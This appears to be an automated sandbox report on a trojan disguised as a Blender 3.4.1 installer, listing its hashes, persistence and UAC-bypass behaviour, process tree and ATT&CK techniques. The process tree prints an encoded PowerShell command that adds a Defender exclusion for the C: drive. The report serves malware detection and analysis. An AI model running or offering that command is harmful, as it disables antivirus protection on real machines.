Overview

overview

10

Static

static

blender-3....64.exe

windows7-x64

10

blender-3....64.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    298s
  • max time network
    315s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-02-2023 10:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    blender-3.4.1-windows-x64.exe

  • Size

    683.8MB

  • MD5

    aedf8960317a0effcd89c5d816137067

  • SHA1

    4e074a8e180a9d3248f5fceadf28ea4f7146b33e

  • SHA256

    eeaaa0e20ba43f13e0b62862979abe7f50bb558a812fc4aa729e946fdbe54e98

  • SHA512

    f1e7d861e01ebcc69cad9cceee712885ef1739a84923787bfe7d9e5e9e108b2721b2a1e916e4a33fa947ac84ed6010c1d32fdf0091b3a9ca7f34738a6be6981a

  • SSDEEP

    3072:mcqqdOyJocZB0O7i4Cg3DILI48p8ERDuwBbEUA:T/dOyJovrg3/ppDuwBYU

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe
    "C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5060
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3536
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      2⤵
      • UAC bypass
      • Suspicious use of AdjustPrivilegeToken
      PID:456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Winlogon Helper DLL

1
T1004

Privilege Escalation

Bypass User Account Control

1
T1088

Defense Evasion

Modify Registry

2
T1112

Bypass User Account Control

1
T1088

Disabling Security Tools

1
T1089

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/456-146-0x0000000000000000-mapping.dmp
    Download
  • memory/456-158-0x0000000006A60000-0x0000000006A7E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/456-157-0x0000000006F00000-0x000000000742C000-memory.dmp
    Filesize

    5.2MB

    Download
  • memory/456-155-0x0000000005690000-0x00000000056E0000-memory.dmp
    Filesize

    320KB

    Download
  • memory/456-154-0x00000000055F0000-0x0000000005666000-memory.dmp
    Filesize

    472KB

    Download
  • memory/456-153-0x0000000005860000-0x0000000005A22000-memory.dmp
    Filesize

    1.8MB

    Download
  • memory/456-151-0x0000000005530000-0x0000000005568000-memory.dmp
    Filesize

    224KB

    Download
  • memory/456-150-0x0000000005400000-0x000000000542E000-memory.dmp
    Filesize

    184KB

    Download
  • memory/456-148-0x0000000000400000-0x00000000004E0000-memory.dmp
    Filesize

    896KB

    Download
  • memory/3536-139-0x00000000059C0000-0x0000000005FE8000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/3536-152-0x0000000007B00000-0x0000000007B0A000-memory.dmp
    Filesize

    40KB

    Download
  • memory/3536-143-0x0000000006D50000-0x0000000006D82000-memory.dmp
    Filesize

    200KB

    Download
  • memory/3536-144-0x000000006FAE0000-0x000000006FB2C000-memory.dmp
    Filesize

    304KB

    Download
  • memory/3536-145-0x0000000006D30000-0x0000000006D4E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/3536-147-0x00000000080E0000-0x000000000875A000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/3536-141-0x0000000006100000-0x0000000006166000-memory.dmp
    Filesize

    408KB

    Download
  • memory/3536-140-0x0000000006090000-0x00000000060F6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/3536-149-0x0000000007A00000-0x0000000007A1A000-memory.dmp
    Filesize

    104KB

    Download
  • memory/3536-161-0x0000000007DB0000-0x0000000007DB8000-memory.dmp
    Filesize

    32KB

    Download
  • memory/3536-138-0x0000000002E60000-0x0000000002E96000-memory.dmp
    Filesize

    216KB

    Download
  • memory/3536-142-0x0000000006770000-0x000000000678E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/3536-137-0x0000000000000000-mapping.dmp
    Download
  • memory/3536-160-0x0000000007DD0000-0x0000000007DEA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/3536-159-0x0000000007CC0000-0x0000000007CCE000-memory.dmp
    Filesize

    56KB

    Download
  • memory/3536-156-0x0000000007D10000-0x0000000007DA6000-memory.dmp
    Filesize

    600KB

    Download
  • memory/3884-134-0x0000000000000000-mapping.dmp
    Download
  • memory/5060-133-0x00000000071C0000-0x00000000071E2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/5060-135-0x00000000080D0000-0x0000000008674000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/5060-136-0x0000000007800000-0x0000000007892000-memory.dmp
    Filesize

    584KB

    Download
  • memory/5060-132-0x0000000000060000-0x000000000007E000-memory.dmp
    Filesize

    120KB

    Download